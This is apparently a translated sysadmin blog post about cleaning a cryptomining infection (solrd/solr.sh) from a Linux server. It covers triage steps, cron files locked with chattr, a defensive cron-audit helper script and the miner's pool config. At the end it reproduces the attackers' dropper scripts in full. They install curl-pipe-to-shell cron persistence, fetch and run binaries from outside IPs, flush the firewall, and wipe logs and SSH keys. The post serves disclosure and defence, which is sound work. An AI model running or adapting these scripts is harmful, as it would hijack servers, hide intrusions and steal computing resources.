The load on one of our company servers suddenly shot up. Checking with the top command, I found a very strange process;

Then I grepped for that process's PID and found it was running from /tmp/.solr/solrd, so I quickly killed the process and deleted the program, and the load came back down. But it wasn't over: running top again, I was surprised to see a script called solr.sh executing. Grepping its PID showed it was also running from tmp, but oddly, although the script was clearly running, it could not be found at that path, and a global find could not locate it either (the dropper script quoted at the end of this post explains why: it launches solr.sh with nohup and deletes the file ten seconds later). To stop it from doing more damage, I killed the process and added a security group in the Alibaba Cloud console that only allows inbound requests on ports 80 and 443;
That still wasn't the end of it. After a while the solr.sh script started running again, but the real culprit, solrd, did not; this should be because the port restriction kept the binary from being downloaded. So I quickly took the following measures:
1. Change the server password;
2. Check /etc/passwd and /etc/group for unfamiliar users;
3. Check the scheduled tasks. This check turned out to matter: there really was something there. But when I tried to clear the cron jobs I found I had no permission. I'm root! No permission, are you kidding me? So I checked for special file attributes, and sure enough there were some; I cleared them one by one. I also checked /etc/cron.d/, /etc/cron.daily/, /etc/cron.deny, /etc/cron.hourly/, /etc/cron.monthly/, /etc/crontab and /etc/cron.weekly/: without exception, every one of them had scheduled tasks, and every one had the special attributes set;
```console
[root@jira-wiki log]# crontab -l
*/10 * * * * curl -fsSL https://pastebin.com/raw/xsC5mrCe | bash
[root@jira-wiki log]# crontab -r
/var/spool/cron/root: Operation not permitted
[root@jira-wiki log]# lsattr /var/spool/cron/
----ia-------e-- /var/spool/cron/root
[root@jira-wiki log]# chattr -ia /var/spool/cron/root
[root@jira-wiki log]# lsattr /var/spool/cron/
-------------e-- /var/spool/cron/root
[root@jira-wiki log]# chattr -e /var/spool/cron/root
[root@jira-wiki log]# lsattr /var/spool/cron/
---------------- /var/spool/cron/root
[root@jira-wiki log]#
```
4. Use last to check the users who logged in recently;
5. Analyze the /var/log/messages and /var/log/secure logs;
6. Move the chattr command somewhere else and rename it, so that only the administrator knows where it is, and set the append-only (`a`) attribute on /var/log/wtmp, /var/log/secure and /var/log/cronrot, otherwise it is very nasty when these logs get wiped. Finally, be sure to clear the traces of moving chattr, so the attackers don't learn where you moved it.
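As an added example (not part of the original post), here is a small POSIX shell helper that automates steps 3 and 6 of the triage above: it flags cron entries that download a remote script and pipe it into a shell, like the pastebin entry found in /var/spool/cron/root, and it reads lsattr output for the immutable (`i`) and append-only (`a`) attributes that blocked `crontab -r`. The function names and the sample inputs are my own.

```shell
#!/bin/sh
# Added example: cron persistence triage helper (not the post's own code).
# Hypothetical functions; the sample cron lines used with them are constructed.

# Print every non-comment cron line that fetches something with curl/wget and
# pipes it into sh/bash, references pastebin, or runs from /tmp or /var/tmp.
# Usage: suspicious_cron_lines <crontab-file>
suspicious_cron_lines() {
    grep -vE '^[[:space:]]*(#|$)' "$1" \
      | grep -E '(curl|wget)[^|]*\|[[:space:]]*(ba)?sh|pastebin\.com|/tmp/|/var/tmp/'
}

# Read lsattr output on stdin and print "FLAGS PATH" for entries that carry
# the i (immutable) or a (append-only) attribute. Such files cannot be
# modified or deleted, even by root, until the attribute is cleared with
# chattr -ia, which is exactly why crontab -r failed above.
locked_attr_entries() {
    awk '{ flags = $1; path = $2
           if (flags ~ /i/ || flags ~ /a/) print flags, path }'
}

# Walk the standard cron locations on a live host and report findings.
# Returns 1 when anything suspicious was found, 0 otherwise.
audit_cron() {
    found=0
    for f in /etc/crontab /etc/cron.d/* /var/spool/cron/* /var/spool/cron/crontabs/*; do
        [ -f "$f" ] || continue
        if [ -n "$(suspicious_cron_lines "$f")" ]; then
            echo "download-and-run cron entry in $f"
            found=1
        fi
        # lsattr only exists on e2fsprogs systems; skip the attribute check otherwise.
        if command -v lsattr >/dev/null 2>&1 \
           && [ -n "$(lsattr "$f" 2>/dev/null | locked_attr_entries)" ]; then
            echo "immutable/append-only attribute on $f (clear with chattr -ia before editing)"
            found=1
        fi
    done
    return $found
}
```

Run `audit_cron` as root; a non-zero exit status means at least one cron file needs a closer look.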
At the time I made a copy of its program, and afterwards I looked through its config file, which contained the following section. Visiting the URL showed it was a Monero mining pool; a Baidu search showed that quite a few people have been hit by this;
```json
"pools": [
{
"algo": null,
"coin": null,
"url": "pool.supportxmr.com:80",
"user": "4APyW6eriFEHcp4jVaGLP7eUVMV332fdrKn5iEqHcPjQMy1giyzy9phM2GrFYJ87eNEXJi3CqTaJYbfBVQWS22ke9ke9oVB",
"pass": "x",
"rig-id": null,
"nicehash": false,
"keepalive": false,
"enabled": true,
"tls": false,
"tls-fingerprint": null,
"daemon": false,
"socks5": null,
"self-select": null
}
],
```
Finally, let me paste what this damned mining virus did on my server, to expose it:
```sh
#!/bin/sh
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
ps aux | grep -v grep | grep 'givemexyz' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'dbuse' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'kdevtmpfsi' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'javaupDates' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'kinsing' | awk '{print $2}' | xargs -I % kill -9 %
killall /tmp/*
killall /tmp/.*
killall /var/tmp/*
killall /var/tmp/.*
pgrep JavaUpdate | xargs -I % kill -9 %
pgrep kinsing | xargs -I % kill -9 %
pgrep donate | xargs -I % kill -9 %
pgrep kdevtmpfsi | xargs -I % kill -9 %
pgrep sysupdate | xargs -I % kill -9 %
pgrep mysqlserver | xargs -I % kill -9 %
chattr -ia /var/spool/cron/root
crontab -r
crontab -l | grep -e "T6hvUyQq" | grep -v grep
if [ $? -eq 0 ]; then
echo "cron good"
else
(
crontab -l 2>/dev/null
echo "*/5 * * * * curl -fsSL https://pastebin.com/raw/T6hvUyQq | sh"
) | crontab -
fi
rm -f /tmp/*
rm -f /tmp/.sola
s2=`whoami`
if [ `whoami` = "root" ];
then
chattr -ia /etc/cron.d/*
rm -rf /etc/cron.d/*
chattr -i /var/spool/cron/crontabs/root
chattr -i /usr/local/bin/dns
rm -f /etc/cron.hourly/oanacroner
rm -f /etc/cron.hourly/oanacrona
rm -f /etc/cron.daily/oanacroner
rm -f /etc/cron.daily/oanacrona
rm -f /etc/cron.monthly/oanacroner
rm -f /usr/local/bin/dns
rm -f /etc/update.sh
chattr -ia /etc/hosts
echo >/etc/hosts
chattr +ia /etc/hosts
chattr -i /etc/sysupdate
rm -f /etc/sysupdate
rm -f /etc/config.json
rm -f /var/tmp/kworkerds
rm -f /usr/bin/.systemcero
rm -f /usr/bin/cloudupdate
rm -f /usr/bin/diskmanagerd
rm -f /lib/libterminfo.so
rm -f /bin/httpsntp
rm -f /bin/ftpsntp
rm -f /var/tmp/jspserv
rm -f /usr/sbin/cron
rm -f /usr/bin/kinsing*
rm -f /etc/cron.d/kinsing*
rm -f /usr/bin/node
chattr -isa /var/spool/cron/*
rm -rf /var/spool/cron/*
chattr +isa /tmp/xms
rm -f /var/tmp/kinsing
chattr -ia /etc/crontab
echo '*/10 * * * * root curl -fsSL https://pastebin.com/raw/xsC5mrCe | sh' > /etc/crontab
chattr +ia /etc/crontab
chattr -ia /var/spool/cron/root
chattr -ia /var/spool/cron/crontabs/root
echo '*/10 * * * * curl -fsSL https://pastebin.com/raw/xsC5mrCe | bash' >/var/spool/cron/root
echo '*/10 * * * * curl -fsSL https://pastebin.com/raw/xsC5mrCe | bash' >/var/spool/cron/crontabs/root
echo '*/10 * * * * root curl -fsSL https://pastebin.com/raw/xsC5mrCe | sh' > /etc/cron.d/root
chattr +ia /var/spool/cron/root
chattr +ia /etc/cron.d/root
chattr +ia /var/spool/cron/crontabs/root
else
ps aux | grep -v 'java\|redis\|weblogic\|mongod\|mysql\|oracle\|tomcat\|grep\|postgres\|atlassian\|awk\|sbin\|WebLogic.sh\|solr\|server\|aux\|httpd\|sh\|sbin|' | grep ${s2:0:7} | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v 'java\|redis\|weblogic\|mongod\|mysql\|oracle\|tomcat\|grep\|postgres\|atlassian\|awk\|sbin\|WebLogic.sh\|solr\|server\|aux\|httpd\|sh\|defunct\|sbin|' | grep $s2 | awk '{print $2}' | xargs -I % kill -9 %
fi
chmod +777 /tmp/*
pkill networkservice
pkill networkser+
pkill watchbog
pkill xmrig
p=$(ps auxf|grep solrd|awk '{if($3>=60.0) print $2}')
name=""$p
if [ -z "$name" ]
then
pkill solr.sh
pkill solrd
ps aux | grep -v grep | grep -v 'java\|redis\|mongod\|mysql\|oracle\|tomcat\|grep\|postgres\|confluence\|awk\|aux\|sh' | awk '{if($3>60.0) print $2}' | xargs -I % kill -9 %
chmod +rwx /tmp/.solr
rm -rf /tmp/.solr
mkdir /tmp/.solr
curl -fsSL http://27.1.1.34:8080/docs/s/config.json -o /tmp/.solr/config.json
curl -fsSL http://222.122.47.27:2143/auth/solrd.exe -o /tmp/.solr/solrd
curl -fsSL http://27.1.1.34:8080/docs/s/solr.sh -o /tmp/.solr/solr.sh
chmod +x /tmp/.solr/solrd
chmod +x /tmp/.solr/solr.sh
nohup /tmp/.solr/solr.sh &>>/dev/null &
sleep 10
rm -f /tmp/.solr/solr.sh
else
exit
fi
```
```sh
#!/bin/bash
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
setenforce 0 2>/dev/null
ulimit -n 65535
ufw disable
iptables -P INPUT ACCEPT
iptables -P OUTPUT ACCEPT
iptables -P FORWARD ACCEPT
iptables -F
echo "vm.nr_hugepages=$((1168+$(nproc)))" | tee -a /etc/sysctl.conf
sysctl -w vm.nr_hugepages=$((1168+$(nproc)))
echo '0' >/proc/sys/kernel/nmi_watchdog
echo 'kernel.nmi_watchdog=0' >>/etc/sysctl.conf
mv /usr/bin/ps.original /usr/bin/ps
netstat -antp | grep ':3333' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep ':4444' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep ':5555' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep ':7777' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep ':14444' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep ':5790' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep ':45700' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep ':2222' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep ':9999' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep ':20580' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep ':13531' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep '23.94.24.12' | awk '{print $7}' | sed -e 's/\/.*//g' | xargs -I % kill -9 %
netstat -antp | grep '134.122.17.13' | awk '{print $7}' | sed -e 's/\/.*//g' | xargs -I % kill -9 %
netstat -antp | grep '66.70.218.40' | awk '{print $7}' | sed -e 's/\/.*//g' | xargs -I % kill -9 %
netstat -antp | grep '209.141.35.17' | awk '{print $7}' | sed -e 's/\/.*//g' | xargs -I % kill -9 %
echo "123"
netstat -antp | grep '119.28.4.91' | awk '{print $7}' | sed -e 's/\/.*//g' | xargs -I % kill -9 %
netstat -antp | grep '101.32.73.178' | awk '{print $7}' | sed -e 's/\/.*//g' | xargs -I % kill -9 %
netstat -antp | grep 185.238.250.137 | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
netstat -antp | grep tmate | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
netstat -antp | grep kinsing | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
netstat -antp | grep kdevtmpfsi | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
netstat -antp | grep pythonww | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
netstat -antp | grep tcpp | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
netstat -antp | grep c3pool | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
netstat -antp | grep xmr | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
netstat -antp | grep f2pool | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
netstat -antp | grep crypto-pool | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
netstat -antp | grep t00ls | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
netstat -antp | grep vihansoft | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
netstat -antp | grep mrbpool | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
ps -fe | grep -v '.rsyslogds' | grep '/tmp' | grep -v grep | awk '{print $2}' | sed -e 's/\/.*//g' | xargs -I % kill -9 %
if ! [ -z "$(command -v wdl)" ] ; then DLB="wdl -O " ; fi ; if ! [ -z "$(command -v wge)" ] ; then DLB="wge -O " ; fi
if ! [ -z "$(command -v wget2)" ] ; then DLB="wget2 -O " ; fi ; if ! [ -z "$(command -v wget)" ] ; then DLB="wget -O " ; fi
if ! [ -z "$(command -v cdl)" ] ; then DLB="cdl -Lk -o " ; fi ; if ! [ -z "$(command -v cur)" ] ; then DLB="cur -Lk -o " ; fi
if ! [ -z "$(command -v curl2)" ] ; then DLB="curl2 -Lk -o " ; fi ; if ! [ -z "$(command -v curl)" ] ; then DLB="curl -Lk -o " ; fi
echo $DLB
if [ -w /usr/sbin ]; then
SPATH=/usr/sbin
else
SPATH=/tmp
fi
ipurl="http://107.172.214.23:1234"
$DLB $SPATH/.rsyslogds $ipurl/.rsyslogds;chmod +x $SPATH/.rsyslogds;/tmp/.rsyslogds;chattr +ai $SPATH/.rsyslogds
$DLB $SPATH/.inis $ipurl/.inis;chmod +x $SPATH/.inis
cd $SPATH/
nohup ./.inis 1>/dev/null 2>&1 &
chattr +ia $SPATH/.inis
history -c
echo 0>/root/.ssh/authorized_keys
echo 0>/var/spool/mail/root
echo 0>/var/log/wtmp
echo 0>/var/log/secure
echo 0>/var/log/cronrot
echo 0>~/.bash_history
```
